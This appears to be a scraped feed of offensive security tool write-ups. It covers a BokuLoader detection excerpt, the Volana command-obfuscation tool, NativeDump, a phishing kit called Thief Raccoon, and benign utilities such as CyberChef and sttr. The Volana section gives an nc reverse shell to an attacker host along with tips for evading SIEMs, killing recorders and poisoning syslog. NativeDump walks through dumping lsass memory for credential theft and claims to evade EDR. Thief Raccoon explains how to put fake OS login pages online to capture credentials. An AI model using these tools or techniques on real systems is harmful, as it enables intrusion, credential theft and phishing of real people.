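    For defenders, the hardcoded strings above can be turned into a quick file-triage check. A minimal sketch (markers.txt and suspect.bin are hypothetical file names, and suspect.bin here is a stand-in sample, not a real dump):

```shell
# Hypothetical triage sketch: flag a file that contains the BokuLoader marker
# strings from the table above.
cat > markers.txt <<'EOF'
BokuLoader
(tomin)
bacons
12367321236742382543232341241261363163151d
EOF

# Stand-in sample; in practice this would be a process dump or suspicious binary
printf 'MZ...(tomin)...' > suspect.bin

# -a treats binary data as text, -F matches fixed strings (no regex)
grep -a -F -q -f markers.txt suspect.bin && echo "BokuLoader markers present"
```

    In a real hunt, the same marker file can be fed to a memory-dump scanner or converted into YARA rules.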

    Memory Allocators

    DLL Module Stomping

    • Kernel32.LoadLibraryExA is called to map the DLL from disk
    • The third argument to Kernel32.LoadLibraryExA is DONT_RESOLVE_DLL_REFERENCES (0x00000001), so the system does not call DllMain
    • Does not resolve addresses in the LDR PEB entry, as detailed by MDSec here
    • Detectable by scanning process memory with the pe-sieve tool

    Heap Allocation

    • Executable RX or RWX memory will exist in the heap if sleepmask kit is not used.

    Mapped Allocator

    • Kernel32.CreateFileMappingA and Kernel32.MapViewOfFile are called to allocate memory for the virtual beacon DLL.

    Sleepmask Detection

    Indirect Syscalls

    • BokuLoader calls the following NT system calls to set up the loaded executable beacon memory: NtAllocateVirtualMemory, NtProtectVirtualMemory
    • These are called indirectly from BokuLoader's executable memory.
    • Userland hooks in ntdll.dll will not detect these system calls.
    • It may be possible to register kernel callbacks with a kernel driver to monitor for the above system calls and detect their usage.
    • BokuLoader itself will contain the mov eax, r11d; mov r11, r10; mov r10, rcx; jmp r11 assembly instructions within its executable memory.

    Virtual Beacon DLL Header

    • The first 0x1000 bytes of the virtual beacon DLL are zeros.
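    A memory scanner can use this as a weak heuristic: a committed executable image whose first page is entirely zero is anomalous. A minimal sketch over a dumped region file (region.bin is a hypothetical dump of the first page of a suspect image base; here an all-zero stand-in is generated for illustration):

```shell
# Stand-in for a dumped first page of a suspect module (all zeros here)
dd if=/dev/zero of=region.bin bs=4096 count=1 2>/dev/null

# A normal PE image base starts with "MZ"; an all-zero first page is anomalous
if [ -z "$(head -c 4096 region.bin | tr -d '\0')" ]; then
    echo "first page is all zeros: possible headerless reflective loader"
fi
```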

    Source Code Available

    • The BokuLoader source code is provided within the repository and can be used to create memory signatures.
    • If you have additional detection guidance, please feel free to contribute by submitting a pull request.

    Credits / References

    Reflective Call Stack Spoofing

    Reflective Loader

    HalosGate SysCaller

    • Reenz0h from @SEKTOR7net
    • Check out Reenz0h's awesome courses and blogs!
    • The best malware-development classes I have taken.
    • Creator of the HalosGate technique; his work was the initial motivation for this work.
    • Sektor7 HalosGate Blog

    HellsGate Syscaller

    Aggressor Scripting

    Cobalt Strike User Defined Reflective Loader

    • https://www.cobaltstrike.com/help-user-defined-reflective-loader

    Great Resource for learning Intel ASM

    ETW and AMSI Bypass

    Implementing ASM in C Code with GCC

    • https://outflank.nl/blog/2020/12/26/direct-syscalls-in-beacon-object-files/
    • https://www.cs.uaf.edu/2011/fall/cs301/lecture/10_12_asm_c.html
    • http://gcc.gnu.org/onlinedocs/gcc-4.0.2/gcc/Extended-Asm.html#Extended-Asm

    Cobalt Strike C2 Profiles



    KitPloit - PenTest Tools!

    Volana - Shell Command Obfuscation To Avoid Detection Systems

    By: Zion3R β€” June 19th 2024 at 12:30


    Shell command obfuscation to avoid SIEM/detection systems.

    During a pentest, an important aspect is stealth. For this reason, you should clear your tracks after your passage. Nevertheless, many infrastructures log commands and ship them to a SIEM in real time, making after-the-fact cleanup useless.

    volana provides a simple way to hide commands executed on a compromised machine by providing its own shell runtime (enter your command, and volana executes it for you). This way, you clear your tracks DURING your passage.


    Usage

    You need an interactive shell (find a way to spawn one; you are a hacker, it's your job!). Then download volana on the target machine and launch it. That's it: you can now type the commands you want executed stealthily.

    ## Download it from github release
    ## If you do not have internet access from compromised machine, find another way
    curl -LO https://github.com/ariary/volana/releases/latest/download/volana

    ## Execute it
    ./volana

    ## You are now under the radar
    volana Β» echo "Hi SIEM team! Do you find me?" > /dev/null 2>&1 #you are allowed to be a bit cocky
    volana Β» [command]

    Keywords for the volana console:
    • ring: enable ring mode, i.e. each command is launched alongside many others to cover your tracks (against solutions that monitor system calls)
    • exit: exit the volana console

    From a non-interactive shell

    Imagine you have a non-interactive shell (webshell or blind RCE): you can use the encrypt and decrypt subcommands. First, you need to build volana with an embedded encryption key.

    On attacker machine

    ## Build volana with encryption key
    make build.volana-with-encryption

    ## Transfer it on TARGET (the unique detectable command)
    ## [...]

    ## Encrypt the command you want to stealthy execute
    ## (Here, a nc reverse shell to obtain an interactive shell)
    volana encr "nc [attacker_ip] [attacker_port] -e /bin/bash"
    >>> ENCRYPTED COMMAND

    Copy the encrypted command and execute it with your RCE on the target machine:

    ./volana decr [encrypted_command]
    ## Now you have a shell: spawn a pty to make it interactive and use volana as usual to stay stealthy (./volana).
    ## Don't forget to remove the volana binary before leaving (the decryption key can easily be retrieved from it).

    Why not just hide the command with echo [command] | base64 and decode it on the target with echo [encoded_command] | base64 -d | bash?

    Because we want protection against systems that alert on base64 usage or that look for base64 text in commands. We also want to make investigation difficult, and base64 is not a real barrier.
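    As an illustration of why plain base64 is weak (the logged command and the detection pattern below are illustrative, not from a real SIEM):

```shell
# What actually lands in a command log when the base64 trick is used
logged='echo aWQ= | base64 -d | bash'

# A naive SIEM rule catches it immediately...
echo "$logged" | grep -q 'base64 -d' && echo "alert: base64 decode in command line"

# ...and an analyst recovers the hidden command in one step
echo 'aWQ=' | base64 -d    # prints: id
```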

    Detection

    Keep in mind that volana is not a miracle that will make you totally invisible. Its aim is to make intrusion detection and investigation harder.

    By "detected" we mean that an alert is triggered when a certain command is executed.

    Hide from

    Only the volana launch command line will be caught. 🧠 However, if you prefix it with a space, bash does not save it to history (this relies on HISTCONTROL containing ignorespace or ignoreboth, the default on many distributions).

    • Detection systems based on history command output
    • Detection systems based on history files
      • .bash_history, .zsh_history, etc.
    • Detection systems based on bash debug traps
    • Detection systems based on sudo's built-in logging
    • Detection systems tracing all process syscalls system-wide (e.g. opensnoop)
    • Terminal (tty) recorders (script, screen -L, sexonthebash, ovh-ttyrec, etc.)
      • Easy to detect and avoid: pkill -9 script
      • Not a common case
      • screen is a bit harder to avoid; however, it does not register input (secret input: stty -echo => avoided)
    • Command detection: can be avoided by using volana with encryption

    Visible for

    • Detection systems that alert on unknown commands (the volana binary itself)
    • Detection systems based on keyloggers
      • Easy to avoid: copy/paste commands
      • Not a common case
    • Detection systems based on syslog files (e.g. /var/log/auth.log)
      • Only for sudo or su commands
      • syslog files can be modified and thus poisoned as you wish (e.g. for /var/log/auth.log: logger -p auth.info "No hacker is poisoning your syslog solution, don't worry")
    • Detection systems based on syscalls (e.g. auditd, LKML/eBPF)
      • Difficult to analyze; can be made unreadable by issuing several diversion syscalls
    • Custom LD_PRELOAD injection for logging
      • Not a common case at all

    Bug bounty

    Sorry for the clickbait title, but no money will be provided to contributors. πŸ›

    Let me know if you have found:
    • a way to detect volana
    • a way to spy on the console that does not detect volana commands
    • a way to avoid a detection system

    Report here

    Credit



    KitPloit - PenTest Tools!

    CyberChef - The Cyber Swiss Army Knife - A Web App For Encryption, Encoding, Compression And Data Analysis

    By: Zion3R β€” June 18th 2024 at 12:30


    CyberChef is a simple, intuitive web app for carrying out all manner of "cyber" operations within a web browser. These operations include simple encoding like XOR and Base64, more complex encryption like AES, DES and Blowfish, creating binary and hexdumps, compression and decompression of data, calculating hashes and checksums, IPv6 and X.509 parsing, changing character encodings, and much more.

    The tool is designed to enable both technical and non-technical analysts to manipulate data in complex ways without having to deal with complex tools or algorithms. It was conceived, designed, built and incrementally improved by an analyst in their 10% innovation time over several years.


    Live demo

    CyberChef is still under active development. As a result, it shouldn't be considered a finished product. There is still testing and bug fixing to do, new features to be added and additional documentation to write. Please contribute!

    Cryptographic operations in CyberChef should not be relied upon to provide security in any situation. No guarantee is offered for their correctness.

    A live demo can be found here - have fun!

    Containers

    If you would like to try out CyberChef locally you can either build it yourself:

    docker build --tag cyberchef --ulimit nofile=10000 .
    docker run -it -p 8080:80 cyberchef

    Or you can use our image directly:

    docker run -it -p 8080:80 ghcr.io/gchq/cyberchef:latest

    This image is built and published through our GitHub Workflows

    How it works

    There are four main areas in CyberChef:

    1. The input box in the top right, where you can paste, type or drag the text or file you want to operate on.
    2. The output box in the bottom right, where the outcome of your processing will be displayed.
    3. The operations list on the far left, where you can find all the operations that CyberChef is capable of in categorised lists, or by searching.
    4. The recipe area in the middle, where you can drag the operations that you want to use and specify arguments and options.

    You can use as many operations as you like in simple or complex ways. Some examples are as follows:

    Features

    • Drag and drop
      • Operations can be dragged in and out of the recipe list, or reorganised.
      • Files up to 2GB can be dragged over the input box to load them directly into the browser.
    • Auto Bake
      • Whenever you modify the input or the recipe, CyberChef will automatically "bake" for you and produce the output immediately.
      • This can be turned off and operated manually if it is affecting performance (if the input is very large, for instance).
    • Automated encoding detection
      • CyberChef uses a number of techniques to attempt to automatically detect which encodings your data is under. If it finds a suitable operation that makes sense of your data, it displays the 'magic' icon in the Output field, which you can click to decode your data.
    • Breakpoints
      • You can set breakpoints on any operation in your recipe to pause execution before running it.
      • You can also step through the recipe one operation at a time to see what the data looks like at each stage.
    • Save and load recipes
      • If you come up with an awesome recipe that you know you'll want to use again, just click "Save recipe" and add it to your local storage. It'll be waiting for you next time you visit CyberChef.
      • You can also copy the URL, which includes your recipe and input, to easily share it with others.
    • Search
      • If you know the name of the operation you want or a word associated with it, start typing it into the search field and any matching operations will immediately be shown.
    • Highlighting
    • Save to file and load from file
      • You can save the output to a file at any time or load a file by dragging and dropping it into the input field. Files up to around 2GB are supported (depending on your browser), however, some operations may take a very long time to run over this much data.
    • CyberChef is entirely client-side
      • It should be noted that none of your recipe configuration or input (either text or files) is ever sent to the CyberChef web server - all processing is carried out within your browser, on your own computer.
      • Due to this feature, CyberChef can be downloaded and run locally. You can use the link in the top left corner of the app to download a full copy of CyberChef and drop it into a virtual machine, share it with other people, or host it in a closed network.

    Deep linking

    By manipulating CyberChef's URL hash, you can change the initial settings with which the page opens. The format is https://gchq.github.io/CyberChef/#recipe=Operation()&input=...

    Supported arguments are recipe, input (encoded in Base64), and theme.
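    For example, a link that opens CyberChef with a "To Base64" recipe and the input "hello" pre-loaded could be built like this (the exact recipe-name and argument encoding shown is an assumption based on URLs the app generates; only the Base64-encoded input parameter is documented above):

```shell
# input= carries the Base64 of the raw input (per the deep-linking format above)
input_b64=$(printf 'hello' | base64)

# Assumed convention: recipe names use underscores, arguments are URL-encoded
echo "https://gchq.github.io/CyberChef/#recipe=To_Base64('A-Za-z0-9%2B/%3D')&input=${input_b64}"
```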

    Browser support

    CyberChef is built to support:

    • Google Chrome 50+
    • Mozilla Firefox 38+

    Node.js support

    CyberChef is built to fully support Node.js v16. For more information, see the "Node API" wiki page

    Contributing

    Contributing a new operation to CyberChef is super easy! The quickstart script will walk you through the process. If you can write basic JavaScript, you can write a CyberChef operation.

    An installation walkthrough, how-to guides for adding new operations and themes, descriptions of the repository structure, available data types and coding conventions can all be found in the "Contributing" wiki page.

    • Push your changes to your fork.
    • Submit a pull request. If you are doing this for the first time, you will be prompted to sign the GCHQ Contributor Licence Agreement via the CLA assistant on the pull request. This will also ask whether you are happy for GCHQ to contact you about a token of thanks for your contribution, or about job opportunities at GCHQ.


    KitPloit - PenTest Tools!

    NativeDump - Dump Lsass Using Only Native APIs By Hand-Crafting Minidump Files (Without MinidumpWriteDump!)

    By: Zion3R β€” June 16th 2024 at 17:16


    NativeDump allows dumping the lsass process using only NTAPIs, generating a Minidump file with only the streams needed to be parsed by tools like Mimikatz or Pypykatz (SystemInfo, ModuleList and Memory64List streams).


    • NtOpenProcessToken and NtAdjustPrivilegesToken to acquire the "SeDebugPrivilege" privilege
    • RtlGetVersion to get the Operating System version details (Major version, minor version and build number). This is necessary for the SystemInfo Stream
    • NtQueryInformationProcess and NtReadVirtualMemory to get the lsasrv.dll address. This is the only module necessary for the ModuleList Stream
    • NtOpenProcess to get a handle for the lsass process
    • NtQueryVirtualMemory and NtReadVirtualMemory to loop through the memory regions and dump all possible ones. At the same time it populates the Memory64List Stream

    Usage:

    NativeDump.exe [DUMP_FILE]

    The default file name is "proc_.dmp":

    The tool has been tested against Windows 10 and 11 devices with the most common security solutions (Microsoft Defender for Endpoints, Crowdstrike...) and is for now undetected. However, it does not work if PPL is enabled in the system.

    Some benefits of this technique are:

    • It does not use the well-known dbghelp!MinidumpWriteDump function
    • It only uses functions from Ntdll.dll, so it is possible to bypass API hooking by remapping the library
    • The Minidump file does not have to be written to disk; you can transfer its bytes (encoded or encrypted) to a remote machine

    The project has three branches at the moment (apart from the main branch with the basic technique):

    • ntdlloverwrite - Overwrite ntdll.dll's ".text" section using a clean version from the DLL file already on disk

    • delegates - Overwrite ntdll.dll + Dynamic function resolution + String encryption with AES + XOR-encoding

    • remote - Overwrite ntdll.dll + Dynamic function resolution + String encryption with AES + Send file to remote machine + XOR-encoding


    Technique in detail: Creating a minimal Minidump file

    After reading the Minidump undocumented structures, the format can be summed up as:

    • Header: Information like the Signature ("MDMP"), the location of the Stream Directory and the number of streams
    • Stream Directory: One entry for each stream, containing the type, total size and location in the file of each one
    • Streams: Every stream contains different information related to the process and has its own format
    • Regions: The actual bytes from the process from each memory region which can be read

    I created a parsing tool which can be helpful: MinidumpParser.

    We will focus on creating a valid file with only the necessary values for the header, stream directory and the only 3 streams needed for a Minidump file to be parsed by Mimikatz/Pypykatz: SystemInfo, ModuleList and Memory64List Streams.


    A. Header

    The header is a 32-byte structure which can be defined in C# as:

    public struct MinidumpHeader
    {
        public uint Signature;
        public ushort Version;
        public ushort ImplementationVersion;
        public ushort NumberOfStreams;
        public uint StreamDirectoryRva;
        public uint CheckSum;
        public IntPtr TimeDateStamp;
    }

    The required values are:
    • Signature: fixed value 0x504D444D (the "MDMP" string)
    • Version: fixed value 0xA793 (Microsoft constant MINIDUMP_VERSION)
    • NumberOfStreams: fixed value 3, the three streams required for the file
    • StreamDirectoryRva: fixed value 0x20 (32 bytes), the size of the header
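    As a sketch, the header bytes can be emitted with nothing but printf, following the Windows SDK MINIDUMP_HEADER field order (Signature, Version, NumberOfStreams, StreamDirectoryRva, CheckSum, TimeDateStamp, Flags; the field widths differ slightly from the C# struct above, but the total is the same 32 bytes):

```shell
# Emit the 32-byte minidump header with the fixed values above, little-endian
{
  printf 'MDMP'                              # Signature 0x504D444D
  printf '\x93\xa7\x00\x00'                  # Version: low word 0xA793
  printf '\x03\x00\x00\x00'                  # NumberOfStreams = 3
  printf '\x20\x00\x00\x00'                  # StreamDirectoryRva = 0x20
  printf '\x00\x00\x00\x00'                  # CheckSum = 0
  printf '\x00\x00\x00\x00'                  # TimeDateStamp = 0
  printf '\x00\x00\x00\x00\x00\x00\x00\x00'  # Flags = 0
} > header.bin

wc -c < header.bin    # prints: 32
```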


    B. Stream Directory

    Each entry in the Stream Directory is a 12-byte structure, so with 3 entries the total size is 36 bytes. The C# struct definition for an entry is:

    public struct MinidumpStreamDirectoryEntry
    {
        public uint StreamType;
        public uint Size;
        public uint Location;
    }

    The field "StreamType" represents the type of stream as an integer or ID, some of the most relevant are:

    ID Stream Type
    0x00 UnusedStream
    0x01 ReservedStream0
    0x02 ReservedStream1
    0x03 ThreadListStream
    0x04 ModuleListStream
    0x05 MemoryListStream
    0x06 ExceptionStream
    0x07 SystemInfoStream
    0x08 ThreadExListStream
    0x09 Memory64ListStream
    0x0A CommentStreamA
    0x0B CommentStreamW
    0x0C HandleDataStream
    0x0D FunctionTableStream
    0x0E UnloadedModuleListStream
    0x0F MiscInfoStream
    0x10 MemoryInfoListStream
    0x11 ThreadInfoListStream
    0x12 HandleOperationListStream
    0x13 TokenStream

    C. SystemInformation Stream

    The first stream is a SystemInformation stream, with ID 7. Its size is 56 bytes and it is located at offset 68 (0x44), after the Stream Directory. Its C# definition is:

    public struct SystemInformationStream
    {
        public ushort ProcessorArchitecture;
        public ushort ProcessorLevel;
        public ushort ProcessorRevision;
        public byte NumberOfProcessors;
        public byte ProductType;
        public uint MajorVersion;
        public uint MinorVersion;
        public uint BuildNumber;
        public uint PlatformId;
        public uint UnknownField1;
        public uint UnknownField2;
        public IntPtr ProcessorFeatures;
        public IntPtr ProcessorFeatures2;
        public uint UnknownField3;
        public ushort UnknownField14;
        public byte UnknownField15;
    }

    The required values are:
    • ProcessorArchitecture: 9 for 64-bit and 0 for 32-bit Windows systems
    • MajorVersion, MinorVersion and BuildNumber: hardcoded or obtained through kernel32!GetVersionEx or ntdll!RtlGetVersion (we will use the latter)


    D. ModuleList Stream

    The second stream is a ModuleList stream, with ID 4. It is located at offset 124 (0x7C), after the SystemInformation stream, and it also has a fixed size, of 112 bytes, since it holds the entry for a single module, the only one needed for the parse to be correct: "lsasrv.dll".

    The typical structure for this stream is a 4-byte value containing the number of entries followed by 108-byte entries for each module:

    public struct ModuleListStream
    {
        public uint NumberOfModules;
        public ModuleInfo[] Modules;
    }

    As there is only one module, it can be simplified to:

    public struct ModuleListStream
    {
        public uint NumberOfModules;
        public IntPtr BaseAddress;
        public uint Size;
        public uint UnknownField1;
        public uint Timestamp;
        public uint PointerName;
        public IntPtr UnknownField2;
        public IntPtr UnknownField3;
        public IntPtr UnknownField4;
        public IntPtr UnknownField5;
        public IntPtr UnknownField6;
        public IntPtr UnknownField7;
        public IntPtr UnknownField8;
        public IntPtr UnknownField9;
        public IntPtr UnknownField10;
        public IntPtr UnknownField11;
    }

    The required values are:
    • NumberOfModules: fixed value 1
    • BaseAddress: using psapi!GetModuleBaseName or a combination of ntdll!NtQueryInformationProcess and ntdll!NtReadVirtualMemory (we will use the latter)
    • Size: obtained by adding all memory region sizes starting at BaseAddress until reaching one with a size of 4096 bytes (0x1000), the .text section of another library
    • PointerName: Unicode string structure for the "C:\Windows\System32\lsasrv.dll" string, located after the stream itself at offset 236 (0xEC)
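    The offsets quoted in these sections follow directly from the fixed sizes; as a sanity check with shell arithmetic:

```shell
# header (32 bytes) + stream directory (3 entries x 12 bytes)
echo $(( 32 + 3 * 12 ))    # prints: 68  (SystemInfo stream offset, 0x44)

# + SystemInfo stream (56 bytes)
echo $(( 68 + 56 ))        # prints: 124 (ModuleList stream offset, 0x7C)

# + ModuleList stream (112 bytes)
echo $(( 124 + 112 ))      # prints: 236 (module-name Unicode string offset, 0xEC)
```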


    E. Memory64List Stream

    The third stream is a Memory64List stream, with ID 9. It is located at offset 298 (0x12A), after the ModuleList stream and the Unicode string, and its size depends on the number of memory regions.

    public struct Memory64ListStream
    {
        public ulong NumberOfEntries;
        public uint MemoryRegionsBaseAddress;
        public Memory64Info[] MemoryInfoEntries;
    }

    Each memory entry is a 16-byte structure:

    public struct Memory64Info
    {
        public IntPtr Address;
        public IntPtr Size;
    }

    The required values are:
    • NumberOfEntries: number of memory regions, obtained after looping over them
    • MemoryRegionsBaseAddress: location of the start of the memory region bytes, calculated by adding the sizes of all 16-byte memory entries
    • Address and Size: obtained for each valid region while looping


    F. Looping memory regions

    There are prerequisites to looping over the memory regions of the lsass.exe process, which can be solved using only NTAPIs:

    1. Obtain the "SeDebugPrivilege" permission. Instead of the typical Advapi!OpenProcessToken, Advapi!LookupPrivilegeValue and Advapi!AdjustTokenPrivilege, we will use ntdll!NtOpenProcessToken, ntdll!NtAdjustPrivilegesToken and the hardcoded value of 20 for the Luid (which is constant in all latest Windows versions)
    2. Obtain the process ID. For example, loop all processes using ntdll!NtGetNextProcess, obtain the PEB address with ntdll!NtQueryInformationProcess and use ntdll!NtReadVirtualMemory to read the ImagePathName field inside ProcessParameters. To avoid overcomplicating the PoC, we will use .NET's Process.GetProcessesByName()
    3. Open a process handle. Use ntdll!NtOpenProcess with permissions PROCESS_QUERY_INFORMATION (0x0400) to retrieve process information and PROCESS_VM_READ (0x0010) to read the memory bytes

    With this it is possible to traverse the process memory by calling:
    • ntdll!NtQueryVirtualMemory: returns a MEMORY_BASIC_INFORMATION structure with the protection type, state, base address and size of each memory region
      • If the memory protection is not PAGE_NOACCESS (0x01) and the memory state is MEM_COMMIT (0x1000), meaning the region is accessible and committed, the base address and size populate one entry of the Memory64List stream and the bytes can be added to the file
      • If the base address equals the lsasrv.dll base address, it is used to calculate the size of lsasrv.dll in memory
    • ntdll!NtReadVirtualMemory: adds the bytes of that region to the Minidump file after the Memory64List stream


    G. Creating Minidump file

    After previous steps we have all that is necessary to create the Minidump file. We can create a file locally or send the bytes to a remote machine, with the possibility of encoding or encrypting the bytes before. Some of these possibilities are coded in the delegates branch, where the file created locally can be encoded with XOR, and in the remote branch, where the file can be encoded with XOR before being sent to a remote machine.




    KitPloit - PenTest Tools!

    Sttr - Cross-Platform, Cli App To Perform Various Operations On String

    By: Zion3R β€” June 8th 2024 at 12:30


    sttr is a command-line tool that lets you quickly run various transformation operations on strings.


    // With input prompt
    sttr

    // Direct input
    sttr md5 "Hello World"

    // File input
    sttr md5 file.text
    sttr base64-encode image.jpg

    // Reading input from other commands like cat, curl, printf, etc.
    echo "Hello World" | sttr md5
    cat file.txt | sttr md5

    // Writing output to a file
    sttr yaml-json file.yaml > file-output.json

    :movie_camera: Demo

    :battery: Installation

    Quick install

    You can run the curl command below to install sttr somewhere in your PATH for easy use. Ideally it will be installed in the ./bin folder.

    curl -sfL https://raw.githubusercontent.com/abhimanyu003/sttr/main/install.sh | sh

    Webi

    MacOS / Linux

    curl -sS https://webi.sh/sttr | sh

    Windows

    curl.exe https://webi.ms/sttr | powershell

    See here

    Homebrew

    If you are on macOS and using Homebrew, you can install sttr with the following:

    brew tap abhimanyu003/sttr
    brew install sttr

    Snap

    sudo snap install sttr

    Arch Linux

    yay -S sttr-bin

    Scoop

    scoop bucket add sttr https://github.com/abhimanyu003/scoop-bucket.git
    scoop install sttr

    Go

    go install github.com/abhimanyu003/sttr@latest

    Manually

    Download the pre-compiled binaries from the Releases page and copy them to the desired location.

    :books: Guide

    • After installation simply run sttr command.
    // For interactive menu
    sttr
    // Provide your input
    // Press enter twice to open the operation menu
    // Press `/` to filter operations.
    // You can also use the Up/Down arrows to select operations.
    • Working with help.
    sttr -h

    // Example
    sttr zeropad -h
    sttr md5 -h
    • Working with files input.
    sttr {command-name} {filename}

    sttr base64-encode image.jpg
    sttr md5 file.txt
    sttr md-html Readme.md
    • Writing output to file.
    sttr yaml-json file.yaml > file-output.json
    • Taking input from other command.
    curl https://jsonplaceholder.typicode.com/users | sttr json-yaml
    • Chaining different processors.
    sttr md5 hello | sttr base64-encode

    echo "Hello World" | sttr base64-encode | sttr md5

    :boom: Supported Operations

    Encode/Decode

    • [x] ascii85-encode - Encode your text to ascii85
    • [x] ascii85-decode - Decode your ascii85 text
    • [x] base32-decode - Decode your base32 text
    • [x] base32-encode - Encode your text to base32
    • [x] base64-decode - Decode your base64 text
    • [x] base64-encode - Encode your text to base64
    • [x] base85-encode - Encode your text to base85
    • [x] base85-decode - Decode your base85 text
    • [x] base64url-decode - Decode your base64 url
    • [x] base64url-encode - Encode your text to url
    • [x] html-decode - Unescape your HTML
    • [x] html-encode - Escape your HTML
    • [x] rot13-encode - Encode your text to ROT13
    • [x] url-decode - Decode URL entities
    • [x] url-encode - Encode URL entities

    Hash

    • [x] bcrypt - Get the Bcrypt hash of your text
    • [x] md5 - Get the MD5 checksum of your text
    • [x] sha1 - Get the SHA1 checksum of your text
    • [x] sha256 - Get the SHA256 checksum of your text
    • [x] sha512 - Get the SHA512 checksum of your text

    String

    • [x] camel - Transform your text to CamelCase
    • [x] kebab - Transform your text to kebab-case
    • [x] lower - Transform your text to lower case
    • [x] reverse - Reverse Text ( txeT esreveR )
    • [x] slug - Transform your text to slug-case
    • [x] snake - Transform your text to snake_case
    • [x] title - Transform your text to Title Case
    • [x] upper - Transform your text to UPPER CASE

    Lines

    • [x] count-lines - Count the number of lines in your text
    • [x] reverse-lines - Reverse lines
    • [x] shuffle-lines - Shuffle lines randomly
    • [x] sort-lines - Sort lines alphabetically
    • [x] unique-lines - Get unique lines from list

    Spaces

    • [x] remove-spaces - Remove all spaces + new lines
    • [x] remove-newlines - Remove all new lines

    Count

    • [x] count-chars - Find the length of your text (including spaces)
    • [x] count-lines - Count the number of lines in your text
    • [x] count-words - Count the number of words in your text

    RGB/Hex

    • [x] hex-rgb - Convert a #hex-color code to RGB
    • [x] hex-encode - Encode your text Hex
    • [x] hex-decode - Convert Hexadecimal to String

    JSON

    • [x] json - Format your text as JSON
    • [x] json-escape - JSON Escape
    • [x] json-unescape - JSON Unescape
    • [x] json-yaml - Convert JSON to YAML text
    • [x] json-msgpack - Convert JSON to MSGPACK
    • [x] msgpack-json - Convert MSGPACK to JSON

    YAML

    • [x] yaml-json - Convert YAML to JSON text

    Markdown

    • [x] markdown-html - Convert Markdown to HTML

    Extract

    • [x] extract-emails - Extract emails from given text
    • [x] extract-ip - Extract IPv4 and IPv6 from your text
    • [x] extract-urls - Extract URLs from your text (we don't do ping checks)

    Other

    • [x] escape-quotes - escape single and double quotes from your text
    • [x] completion - generate the autocompletion script for the specified shell
    • [x] interactive - Use sttr in interactive mode
    • [x] version - Print the version of sttr
    • [x] zeropad - Pad a number with zeros
    • [x] and adding more....

    Featured On

    These are a few of the places where sttr was highlighted; many thanks to all of you. Please feel free to add any blogs or videos you may have made that discuss sttr.



    KitPloit - PenTest Tools!

    PIP-INTEL - OSINT and Cyber Intelligence Tool

    By: Zion3R β€” June 7th 2024 at 12:30



    Pip-Intel is a powerful tool designed for OSINT (Open Source Intelligence) and cyber intelligence gathering activities. It consolidates various open-source tools into a single user-friendly interface, simplifying the data collection and analysis processes for researchers and cybersecurity professionals.

    Pip-Intel utilizes Python-written pip packages to gather information from various data points. This tool is equipped with the capability to collect detailed information through email addresses, phone numbers, IP addresses, and social media accounts. It offers a wide range of functionalities including email-based OSINT operations, phone number-based inquiries, geolocating IP addresses, social media and user analyses, and even dark web searches.




    ☐ ☆ ✇ KitPloit - PenTest Tools!

    Thief Raccoon - Login Phishing Tool

    By: Zion3R — June 6th 2024 at 12:30


    Thief Raccoon is a tool designed for educational purposes to demonstrate how phishing attacks can be conducted on various operating systems. This tool is intended to raise awareness about cybersecurity threats and help users understand the importance of security measures like 2FA and password management.


    Features

    • Phishing simulation for Windows 10, Windows 11, Windows XP, Windows Server, Ubuntu, Ubuntu Server, and macOS.
    • Capture user credentials for educational demonstrations.
    • Customizable login screens that mimic real operating systems.
    • Full-screen mode to enhance the phishing simulation.

    Installation

    Prerequisites

    • Python 3.x
    • pip (Python package installer)
    • ngrok (for exposing the local server to the internet)

    Download and Install

    1. Clone the repository:

    ```bash
    git clone https://github.com/davenisc/thief_raccoon.git
    cd thief_raccoon
    ```

    2. Install python venv:

    ```bash
    apt install python3.11-venv
    ```

    3. Create the venv and activate it:

    ```bash
    python -m venv raccoon_venv
    source raccoon_venv/bin/activate
    ```

    4. Install the required libraries:

    ```bash
    pip install -r requirements.txt
    ```

    Usage

    1. Run the main script:

    ```bash
    python app.py
    ```

    2. Select the operating system for the phishing simulation:

    After running the script, you will be presented with a menu to select the operating system. Enter the number corresponding to the OS you want to simulate.

    3. Access the phishing page:

    If you are on the same local network (LAN), open your web browser and navigate to http://127.0.0.1:5000.

    If you want to make the phishing page accessible over the internet, use ngrok.

    Using ngrok

    1. Download and install ngrok

    Download ngrok from ngrok.com and follow the installation instructions for your operating system.

    2. Expose your local server to the internet:

    3. Get the public URL:

    After running the above command, ngrok will provide you with a public URL. Share this URL with your test subjects to access the phishing page over the internet.

    How to install Ngrok on Linux?

    1. Install ngrok via Apt with the following command:

    ```bash
    curl -s https://ngrok-agent.s3.amazonaws.com/ngrok.asc \
      | sudo tee /etc/apt/trusted.gpg.d/ngrok.asc >/dev/null \
      && echo "deb https://ngrok-agent.s3.amazonaws.com buster main" \
      | sudo tee /etc/apt/sources.list.d/ngrok.list \
      && sudo apt update \
      && sudo apt install ngrok
    ```

    2. Run the following command to add your authtoken to the default ngrok.yml:

    ```bash
    ngrok config add-authtoken xxxxxxxxx--your-token-xxxxxxxxxxxxxx
    ```

    Deploy your app online

    1. Put your app online at an ephemeral domain, forwarding to your upstream service. For example, if the phishing page is listening on http://localhost:5000, run:

    ```bash
    ngrok http http://localhost:5000
    ```

    Example

    1. Run the main script:

    ```bash
    python app.py
    ```

    2. Select Windows 11 from the menu:

    ```
    Select the operating system for phishing:
    1. Windows 10
    2. Windows 11
    3. Windows XP
    4. Windows Server
    5. Ubuntu
    6. Ubuntu Server
    7. macOS
    Enter the number of your choice: 2
    ```

    3. Access the phishing page:

    Open your browser and go to http://127.0.0.1:5000 or the ngrok public URL.

    Disclaimer

    This tool is intended for educational purposes only. The author is not responsible for any misuse of this tool. Always obtain explicit permission from the owner of the system before conducting any phishing tests.

    License

    This project is licensed under the MIT License. See the LICENSE file for details.

    ScreenShots

    Credits

    Developer: @davenisc
    Web: https://davenisc.com



    ☐ ☆ ✇ KitPloit - PenTest Tools!

    X-Recon - A Utility For Detecting Webpage Inputs And Conducting XSS Scans

    By: Zion3R — June 5th 2024 at 12:30

    A utility for identifying web page inputs and conducting XSS scanning.


    Features:

    • Subdomain Discovery:
    • Retrieves relevant subdomains for the target website and consolidates them into a whitelist. These subdomains can be utilized during the scraping process.

    • Site-wide Link Discovery:

    • Collects all links throughout the website based on the provided whitelist and the specified max_depth.

    • Form and Input Extraction:

    • Identifies all forms and inputs found within the extracted links, generating a JSON output. This JSON output serves as a foundation for leveraging the XSS scanning capability of the tool.

    • XSS Scanning:

    • Once the start recon option returns a custom JSON containing the extracted entries, the X-Recon tool can initiate the XSS vulnerability testing process and furnish you with the desired results!



    Note:

